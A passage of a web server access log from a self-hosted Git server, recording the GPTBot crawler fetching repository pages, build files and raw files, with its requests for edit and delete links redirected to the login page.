"https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/global.json" +[17/Feb/2026:17:23:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9973] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:17:23:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/libstdc++-6.dll" [Client 74.7.227.38] [Length 11078] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog" +[17/Feb/2026:17:23:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11169] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:17:23:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11167] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:17:23:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10025] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build" +[17/Feb/2026:17:23:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10049] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build" +[17/Feb/2026:17:23:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:23:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 17058] [Gzip 12.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:23:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 7578] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:23:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11116] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:17:23:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:17:23:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:23:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresWatchdog/libstdc++-6.dll" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libstdc++-6.dll" +[17/Feb/2026:17:23:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresWatchdog/libstdc++-6.dll" +[17/Feb/2026:17:23:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresWatchdog/libstdc++-6.dll" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libstdc++-6.dll" +[17/Feb/2026:17:23:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresWatchdog/libstdc++-6.dll" +[17/Feb/2026:17:23:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:23:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9926] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1" +[17/Feb/2026:17:23:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api" [Client 74.7.227.38] [Length 9953] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1" +[17/Feb/2026:17:23:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake" [Client 74.7.227.38] [Length 10116] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1" +[17/Feb/2026:17:23:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10294] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1" +[17/Feb/2026:17:23:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10681] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1" +[17/Feb/2026:17:23:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9950] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1" +[17/Feb/2026:17:23:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:23:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresWatchdog/libstdc++-6.dll" [Client 74.7.227.38] [Length 874] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libstdc++-6.dll" +[17/Feb/2026:17:23:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresWatchdog/libstdc++-6.dll" [Client 74.7.227.38] [Length 2464009] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libstdc++-6.dll" +[17/Feb/2026:17:23:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&state=open&type=all" [Client 74.7.227.38] [Length 10157] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues" +[17/Feb/2026:17:23:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:23:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PythonTest/my_database.db" [Client 74.7.227.38] [Length 11073] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest" +[17/Feb/2026:17:23:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api" +[17/Feb/2026:17:23:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake" +[17/Feb/2026:17:23:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9973] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:17:23:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 14338] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:17:23:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:17:23:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11353] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:17:23:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 10006] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:17:23:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/nos_setup.exe" [Client 74.7.227.38] [Length 11025] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" +[17/Feb/2026:17:23:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/assets_data.csv" [Client 74.7.227.38] [Length 11323] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot" +[17/Feb/2026:17:23:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/user_assets.csv" [Client 74.7.227.38] [Length 11311] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot" +[17/Feb/2026:17:23:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PythonTest/my_database.db" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/my_database.db" +[17/Feb/2026:17:23:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PythonTest/my_database.db" +[17/Feb/2026:17:23:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PythonTest/my_database.db" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/my_database.db" +[17/Feb/2026:17:23:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PythonTest/my_database.db" +[17/Feb/2026:17:23:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PythonTest/my_database.db" [Client 74.7.227.38] [Length 875] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/my_database.db" +[17/Feb/2026:17:23:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PythonTest/my_database.db" [Client 74.7.227.38] [Length 8192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/my_database.db" +[17/Feb/2026:17:23:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 9985] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" +[17/Feb/2026:17:23:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 2092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" +[17/Feb/2026:17:23:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 14597] [Gzip 9.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" +[17/Feb/2026:17:23:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9982] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:17:23:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/nos_setup.exe" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/nos_setup.exe" +[17/Feb/2026:17:23:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/nos_setup.exe" +[17/Feb/2026:17:23:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/assets_data.csv" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/assets_data.csv" +[17/Feb/2026:17:23:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/assets_data.csv" +[17/Feb/2026:17:23:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/user_assets.csv" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/user_assets.csv" +[17/Feb/2026:17:23:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/user_assets.csv" +[17/Feb/2026:17:23:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/assets_data.csv" 